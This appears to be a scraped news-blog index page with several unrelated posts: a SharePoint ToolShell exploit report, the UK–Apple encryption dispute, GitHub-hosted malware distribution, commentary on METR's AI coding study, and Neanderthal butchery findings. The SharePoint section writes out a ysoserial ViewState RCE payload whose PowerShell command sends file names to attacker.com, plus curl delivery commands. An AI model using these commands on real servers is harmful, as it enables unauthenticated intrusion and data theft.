Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the ValidationKey directly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed __VIEWSTATE payloads using a tool called ysoserial as shown in the example below.

Using ysoserial the attacker can generate it’s own valid SharePoint tokens for RCE.

# command to get the  via any public available SharePoint page, like start.aspx  curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="K[^"]+'  # example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir  ysoserial.exe -p ViewState -g TypeConfuseDelegate   -c "powershell -nop -c "dir 'C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15TEMPLATELAYOUTS' | %  Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) ""   --generator=""   --validationkey=""   --validationalg=""   --islegacy   --minify  # finally, by adding the generated token to any request, the command is executed (RCE)  curl http://target/_layouts/15/success.aspx?__VIEWSTATE=

These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.

Patching is only the start

The attackers are using the capability to steal SharePoint ASP.NET machine keys, which allow the attackers to stage hacks of additional infrastructure at a later time. That means that patching alone provides no assurance that attackers have been driven out of a compromised system. Instead, affected organizations must rotate SharePoint ASP.NET machine keys and restart the IIS web server running on top.

According to The Washington Post, at least two federal agencies have found that servers inside their networks were breached in the ongoing attacks.

The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.

In a post on Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.

SharePoint vulnerability with 9.8 severity rating under exploit across globe Read More »

uk-backing-down-on-apple-encryption-backdoor-after-pressure-from-us

UK backing down on Apple encryption backdoor after pressure from US

Under the terms of the legislation, recipients of such a notice are unable to discuss the matter publicly, even with customers affected by the order, unless granted permission by the Home Secretary.

The legislation’s use against Apple has triggered the tech industry’s highest-profile battle over encryption technology in almost a decade.

In response to the demand, Apple withdrew its most secure cloud storage service from the UK in February and is now challenging the Home Office’s order at the Investigatory Powers Tribunal, which probes complaints against the UK’s security services.

Last month, Meta-owned WhatsApp said it would join Apple’s legal challenge, in a rare collaboration between the Silicon Valley rivals.

In the meantime, the Home Office continues to pursue its case with Apple at the tribunal.

Its lawyers discussed the next legal steps this month, reflecting the divisions within government over how best to proceed. “At this point, the government has not backed down,” said one person familiar with the legal process.

A third senior British official added that the UK government was reluctant to push “anything that looks to the US vice-president like a free-speech issue.”

In a combative speech at the Munich Security Conference in February, Vance argued that free speech and democracy were threatened by European elites.

The UK official added, this “limits what we’re able to do in the future, particularly in relation to AI regulation.” The Labour government has delayed plans for AI legislation until after May next year.

Trump has also been critical of the UK stance on encryption.

The US president has likened the UK’s order to Apple to “something… that you hear about with China,” saying in February that he had told Starmer: “You can’t do this.”

US Director of National Intelligence Tulsi Gabbard has also suggested the order would be an “egregious violation” of Americans’ privacy that risked breaching the two countries’ data agreement.

Apple did not respond to a request for comment. “We have never built a back door or master key to any of our products, and we never will,” Apple said in February.

The UK government did not respond to a request for comment.

A spokesperson for Vance declined to comment.

The Home Office has previously said the UK has “robust safeguards and independent oversight to protect privacy” and that these powers “are only used on an exceptional basis, in relation to the most serious crimes.”

© 2025 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.

UK backing down on Apple encryption backdoor after pressure from US Read More »

github-abused-to-distribute-payloads-on-behalf-of-malware-as-a-service

GitHub abused to distribute payloads on behalf of malware-as-a-service

Researchers from Cisco’s Talos security team have uncovered a malware-as-a-service operator that used public GitHub accounts as a channel for distributing an assortment of malicious software to targets.

The use of GitHub gave the malware-as-a-service (MaaS) a reliable and easy-to-use platform that’s greenlit in many enterprise networks that rely on the code repository for the software they develop. GitHub removed the three accounts that hosted the malicious payloads shortly after being notified by Talos.

“In addition to being an easy means of file hosting, downloading files from a GitHub repository may bypass Web filtering that is not configured to block the GitHub domain,” Talos researchers Chris Neal and Craig Jackson wrote Thursday. “While some organizations can block GitHub in their environment to curb the use of open-source offensive tooling and other malware, many organizations with software development teams require GitHub access in some capacity. In these environments, a malicious GitHub download may be difficult to differentiate from regular web traffic.”

Emmenhtal, meet Amadey

The campaign, which Talos said had been ongoing since February, used a previously known malware loader tracked under names including Emmenhtal and PeakLight. Researchers from security firm Palo Alto Networks and Ukraine’s major state cyber agency SSSCIP had already documented the use of Emmenhtal in a separate campaign that embedded the loader into malicious emails to distribute malware to Ukrainian entities. Talos found the same Emmenhtal variant in the MaaS operation, only this time the loader was distributed through GitHub.

The campaign using GitHub was different from one targeting Ukrainian entities in another key way. Whereas the final payload in the one targeting the Ukrainian entities was a malicious backdoor known as SmokeLoader, the GitHub one installed Amadey, a separate malware platform known. Amadey was first seen in 2018 and was initially used to assemble botnets. Talos said the primary function of Amadey is to collect system information from infected devices and download a set of secondary payloads that are customized to their individual characteristics, based on the specific purpose in different campaigns.

GitHub abused to distribute payloads on behalf of malware-as-a-service Read More »

on-metr’s-ai-coding-rct

On METR’s AI Coding RCT

METR ran a proper RCT experiment seeing how much access to Cursor (using Sonnet 3.7) would accelerate coders working on their own open source repos.

Everyone surveyed expected a substantial speedup. The developers thought they were being substantially sped up.

Instead, it turned out that using Cursor slowed them down.

That surprised everyone, raising the question of why.

Currently our best guess is this comes down to a combination of two factors:

  1. Deeply understood open source repos are close to a worst-case scenario for AI tools, because they require bespoke outputs in various ways and the coder has lots of detailed local knowledge of the codebase that the AI lacks.

  2. The coders in question mostly did not have experience with similar AI tools. The lack of a learning curve during the experiment challenges this, but the tools very clearly have a sharp learning curve the same way other programming does.

Thus we should be careful interpreting the result. It was still highly virtuous to run an RCT, and to publish the results even when they were against interest and counterintuitive, and at risk of being quoted endlessly in misleading fashion by AI skeptics. That is how real science works.

In this case the haters were right, honestly great call by the haters (paper here, blog post here), at least on the headline result.

Again, due to all the circumstances, one should avoid inferring too much. I would like to see the study done again where everyone had at least a few weeks of working full time with such tools, ideally also while working on other types of projects. And a result this surprising means we should be on the lookout for flaws.

The result was still very much surprising to METR, to the developers in the test, to the forecasters, and also to those who saw the results.

Yo Shavit: something something METR good bc publishing against their priors blah blah

all I care about is that this vindicates my incompetence in using models for my actual work

Dwarkesh Patel: Surely this doesn’t have implications for how I use AI and whether I’m fooling myself about how much more effective it’s making my podcast prep, right? 😅

METR: We ran a randomized controlled trial to see how much AI coding tools speed up experienced open-source developers.

The results surprised us: Developers thought they were 20% faster with AI tools, but they were actually 19% slower when they had access to AI than when they didn’t.

We recruited 16 experienced open-source developers to work on 246 real tasks in their own repositories (avg 22k+ stars, 1M+ lines of code).

We randomly assigned each task to either allow AI (typically Cursor Pro w/ Claude 3.5/3.7) or disallow AI help.

At the beginning of the study, developers forecasted that they would get sped up by 24%. After actually doing the work, they estimated that they had been sped up by 20%. But it turned out that they were actually slowed down by 19%.

We were surprised by this, given a) impressive AI benchmark scores, b) widespread adoption of AI tooling for software development, and c) our own recent research measuring trends in the length of tasks that agents are able to complete.

When AI is allowed, developers spend less time actively coding and searching for information, and instead spend time prompting AI, waiting on/reviewing AI outputs, and idle. We find no single reason for the slowdown—it’s driven by a combination of factors.

To better understand these factors, we investigate 20 properties of our setting, finding 5 likely contributors, and 8 mixed/unclear factors.

We also analyze to make sure the result isn’t a fluke, and find that slowdown persists across different outcome measures, estimator methodologies, and many other subsets/analyses of our data.

What do we take away?

1. It seems likely that for some important settings, recent AI tooling has not increased productivity (and may in fact decrease it).

2. Self-reports of speedup are unreliable—to understand AI’s impact on productivity, we need experiments in the wild.

Another implication:

It is sometimes proposed that we should monitor AI R&D acceleration inside of frontier AI labs via simple employee surveys. We’re now more pessimistic about these, given how large of a gap we observe between developer-estimated and observed speed-up.

What we’re NOT saying:

1. Our setting represents all (or potentially even most) software engineering.

2. Future models won’t be better (or current models can’t be used more effectively).

David Rein: I was pretty skeptical that this study was worth running, because I thought that *obviouslywe would see significant speedup.

Charles Foster: Before you say “this isn’t surprising”…

Yes, it is. We got people to preregister their expectations, and even folks who are extremely in-the-know about AI coding abilities still failed to predict this result.

Your *vibesare not reliable indicators of productivity effects.

Jeffrey Ladish: Surprising results from METR re AI software engineer uplift! Great to see this kind of empirical investigation. Our intuitions are not always correct…

I do think this is to some extent a skill issue. Pretty sure I know some people who’ve learned to use the tools effectively and get a big speed and quality boost.

Daniel Kokotajlo: Very important work! This also has lengthened my timelines somewhat, for obvious reasons. 🙂

In perhaps the most shocking fact of all, developers actually slightly overestimated their required time in the non-AI scenario, I thought that was never how any of this worked?

So now that we have the result, in addition to updating in general, what explains why this situation went unusually poorly?

Here are the paper’s own theories first:

The big disagreement is over the first factor here, as to whether the development environment and associated AI tools should count as familiar in context.

There are several factors that made this situation unusually AI-unfriendly.

AI coding is at its best when it is helping you deal with the unfamiliar, compensate for lack of skill, and when it can be given free reign or you can see what it can do and adapt the task to the tool. Those didn’t apply here.

Roon: IME really good software ppl who deeply care find the least use from LLM coding and are often ideologically opposed to it because they like to exert editorial control over every line. slop research coders such as myself don’t care as much and have much larger gains.

this result is still surprising, how/why does it slow them down? but I wouldn’t think it generalizes to the average software developer who’s just trying to get some damn thing done and not trying to write maintainable useful code on a top open source library.

Eric Raymond: I think I qualify as an experienced open source developer, and that study looks completely ridiculous to me.

I’ve discussed it with some peers. We think one of the confounders may be that LLMs are much better at accelerating green-field development then fixing or improving large existing codebases.

Also there’s a difference in their performance between front-end and back-end stuff. Big advantage for web front-end dev, not so much for back-end. I’ve experienced this difference myself.

Or as Joel Becker says, ‘our setting was weird.

Steve Newman has an excellent analysis of many aspects of this question.

  1. These were projects that the developers already knew intimately, with high context, and they did the task they would otherwise have done next. They were already familiar with the repos and working on at a very high skill level, and were trying to adapt the tool to the task and not the task to the tool.

    1. In particular, they broke down tasks into 1-2 hour chunks before they knew whether they could use AI for the subtasks. That’s great RCT design, but does mean flexibility was limited.

  2. These were large open source projects that thus have a variety of high standards and requirements, and require a lot of tacit knowledge and context. AI code that is ‘good enough’ in other contexts wasn’t up to standards here, and this was identified as the biggest factor, only 39% of Cursor generations were accepted and many of those still required reworking.

  3. Pay was by the hour so there was large temptation to let the AI cook and otherwise work not so efficiently. From Ruby we get the reminder that a natural thing to do when working in Cursor is end up checking social media while it runs.

  4. They certainly weren’t doing AI coder multitasking or anything like that.

  5. As always, there is a lag, this was done with Sonnet 3.5/3.7. Ruby notes that the models we have now are already substantially better.

  6. The tasks were modestly beyond the range of tasks Sonnet 3.7 can do autonomously, as per METR’s own measurements (plus the contractor vs. maintainer contrast).

  7. The AI tools offered were often new to their users, which slows people down. Participants might have been partly learning AI tools on METR’s dime? Developers said they weren’t significantly inconvenienced by the tool changes but you can’t trust self-reports.

  8. Some participants seem to have gone a bit overboard with AI usage as part of the experiment?

We also have a direct post mortem from Quentin Anthony, who was one of the 16 devs and experienced a 38% speedup when using AI, the best result of all participants. He ascribes others getting poor results in large part to:

  1. Falling into the failure mode of pressing the magic bullet AI button hoping the problem gets solved, which is not a good workflow, rather than AI as a tool.

  2. Getting distracted during downtime as they wait for AI, also not a good workflow.

  3. AIs running into various problems where they perform poorly.

All of that is true, but none of it seems like enough to explain the result.

By far the strongest counterargument to the study is to claim the users simply lacked the required experience using this form of AI, so of course they struggled.

Credit to Emmett Shear for being the first one to prominently lay this out fully.

Emmett Shear: METR’s analysis of this experiment is wildly misleading. The results indicate that people who have ~never used AI tools before are less productive while learning to use the tools, and say ~nothing about experienced AI tool users. Let’s take a look at why.

I immediately found the claim suspect because it didn’t jibe with my own experience working w people using coding assistants, but sometimes there are surprising results so I dug in. The first question: who were these developers in the study getting such poor results?

They claim “a range of experience using AI tools”, yet only a single developer of their sixteen had more than a single week of experience using Cursor. They make it look like a range by breaking “less than a week” into <1 hr, 1-10hrs, 10-30hrs, and 30-50hrs of experience.

Given the long steep learning curve for effectively using these new AI tools well, this division betrays what I hope is just grossly negligent ignorance about that reality, rather than intentional deception.

Of course, the one developer who did have more than a week of experience was 20% faster instead of 20% slower.

David Rein: Devs had roughly the following prior LLM experience:

– 7/16 had >100s of hours

– 7/16 had 10-100 hours

– 2/16 had 1-10 hours

We think describing this as “moderate AI experience” is fair, my guess is we’ll have to agree to disagree, but appreciate the feedback!

Emmett Shear: I think conflating the two completely invalidates the study’s headline and summary results. I suppose the future will tell if this is the case. I’m glad to have found the underlying disagreement.

It is clear that the source of disagreement is that I think using Cursor effectively is a distinct skill from talking to ChatGPT while you program and expect fairly low transfer, and the authors think it’s the similar skill and expect much higher.

I think Emmett is right that these tools are not similar. The data point that still needs to be explained is (see Table 1 above) the lack of improvement over those 30-50 hours using Cursor. If the learning curve is steep then devs should be improving rapidly over that time. So I can still definitely see this going either way.

Regardless, this was an unusually hostile setting on many fronts, including the lack of experience. The result still is important in general.

Roon: am curious about a few things. the archetype of an “experienced open source developer” is very different from your average developer. is there a subset of inexperienced developers? developers who work for random companies but are not enthusiasts?

David Rein: yeah the open-source repos do typically have pretty high standards for linting, test coverage, etc.—not all of which is super clear in contributing guidelines necessarily (making it harder for AI to help)

Minh Nhat Nguyen: I would critique the “their own repos” part. by far the biggest unlock i have when using AI coding is navigating unfamiliar repos.

After some iteration, even if an AI made the initial draft, I’d be faster working myself on repos I already know well.

David Rein: One of the most confusing aspects of the result is that we don’t *requiredevelopers to use AI, they’re just *allowedto use it. So in principle, they should be able to just not use AI if it’s slowing them down.

There are two main explanations we have for this.

The first is that developers think that AI is speeding them up (they estimate they were sped up by 20%).

The second is that developers might be trading some speed for ease—using Cursor may be so much more pleasant that developers don’t notice or mind that they’re slowed down.

One common question is how much experience the developers have with AI tools—maybe they’re just particularly bad at using AI? While they aren’t AI power users before the study, nearly all have tens to hundreds of hours of prior experience using LLMs.

44% of the developers had used Cursor before, and for ~19% of them it was already their primary IDE. Furthermore, throughout the study, they spend around 20 hours allowed to use AI tools—and we don’t see speedup when excluding up to their first 8 tasks with AI.

We further rule out a bunch of potential experimental artifacts: we don’t have dropout/attrition issues, the results are robust to variations of our outcome estimation methodology, developers primarily use frontier models (at the time), and we don’t see cheating.

Some other interesting findings! We find that developers are slowed down less on tasks they are less familiar with. This is intuitive—if you really know what you’re doing, AI can be less marginally helpful. Because we collect forecasts from developers on how long they expect issues to take both with and without AI, we can measure their speedup as a function of how much speedup they expect for particular issues. Developers are actually somewhat calibrated on AI’s usefulness!

Just for fun, here are the repositories developers were working on in the study—they’re pretty impressive! I was really impressed by the general skill of the developers—they’re really experienced, and they contribute to large, complex projects.

Another takeaway worth noting is that self-reports of coding productivity, or productivity gains from AI, cannot be trusted, in general Peter’s thread is excellent.

Peter Wildeford: I definitely think the biggest takeaway from this paper is that we likely can’t trust self-reports. This is pretty surprising to me, but is a finding commonly seen in productivity literature.

The March @METR_Evals paper contained this nugget about contractors being much slower [5x-18x slower to fix issues!] than maintainers. This seems born out today, as the new study on AI slowdown was solely on maintainers – METR studied 16 long‑time maintainers with an average of 5 yrs prior work on the repo

Seems important to keep in mind for AI timelines when interpreting the prior METR paper on task horizon length that the comparison was AI to contractors. A comparison of AI to veteran SWEs likely would have been tougher. I guess humans have returns to experience!

This does make me strongly suspect the METR paper on AI productivity slowdown would’ve gone differently if it was measuring junior engineers or senior engineers in new projects, as opposed to where there’s significant pre-existing fit with the exact work. My hypothesis is that the results in this paper are real, but don’t apply to a wide variety of scenarios where AIs do speed people up.

I am somewhat convinced by Emmett Shear’s explanation. I strongly agree that ‘experience with LLMs’ does not translate cleanly to ‘experience with Cursor’ or with AI coding tools, although experience with other AI IDEs would fully count. And yes, there is a rather steep learning curve.

So I wouldn’t get too excited by all this until we try replication with a group that has a lot more direct experience. It should not be too hard to find such a group.

Certainly I still think AI is a vast productivity enhancer for most coders, and that Opus 4 (or your preferred alternative) is a substantial upgrade over Sonnet 3.7. Also Claude Code seems to be the core of the optimal stack at this point, with Cursor as a secondary tool. This didn’t change my estimates of the ‘normal case’ by that much.

I still think this is a meaningful update. The result was very different than people expected, and participants did not seem to be moving up the learning curve.

Discussion about this post

On METR’s AI Coding RCT Read More »

local-cuisine-was-on-the-menu-at-cafe-neanderthal

Local cuisine was on the menu at Cafe Neanderthal

Gazelle prepared “a la Amud,” or “a la Kebara”?

Neanderthals at Kebara had pretty broad tastes in meat. The butchered bones found in the cave were mostly an even mix of small ungulates (largely gazelle) and medium-sized ones (red deer, fallow deer, wild goats, and boar), with just a few larger game animals thrown in. And it looks like the Kebara Neanderthals were “use the whole deer” sorts of hunters because the bones came from all parts of the animals’ bodies.

On the other hand (or hoof), at Amud, archaeologists found that the butchered bones were almost entirely long bone shafts—legs, in other words—from gazelle. Apparently, the Neanderthal hunters at Amud focused more on gazelle than on larger prey like red deer or boar, and they seemingly preferred meat from the legs.

And not too fresh, apparently—the bones at Kebara showed fewer cut marks, and the marks that were there tended to be straighter. Meanwhile, at Amud, the bones were practically cluttered with cut marks, which crisscrossed over each other and were often curved, not straight. According to Jallon and her colleagues, the difference probably wasn’t a skill issue. Instead, it may be a clue that Neanderthals at Amud liked their meat dried, boiled, or even slightly rotten.

That’s based on comparisons to what bones look like when modern hunter-gatherers butcher their game, along with archaeologists’ experiments with stone tool butchery. First, differences in skill between newbie butchers and advanced ones don’t produce the same pattern of cut marks Jallon and her colleagues saw at Amud. But “it has been shown that decaying carcasses tend to be more difficult to process, often resulting in the production of haphazard, deep, and sinuous cut marks,” as Jallon and her colleagues wrote in their recent paper.

So apparently, for reasons unknown to modern archaeologists, the meat on the menu at Amud was, shall we say, a bit less fresh than that at Kebara. Said menu was also considerably less varied. All of that meant that if you were a Neanderthal from Amud and stopped by Kebara for dinner (or vice versa) your meal might seem surprisingly foreign.

Local cuisine was on the menu at Cafe Neanderthal Read More »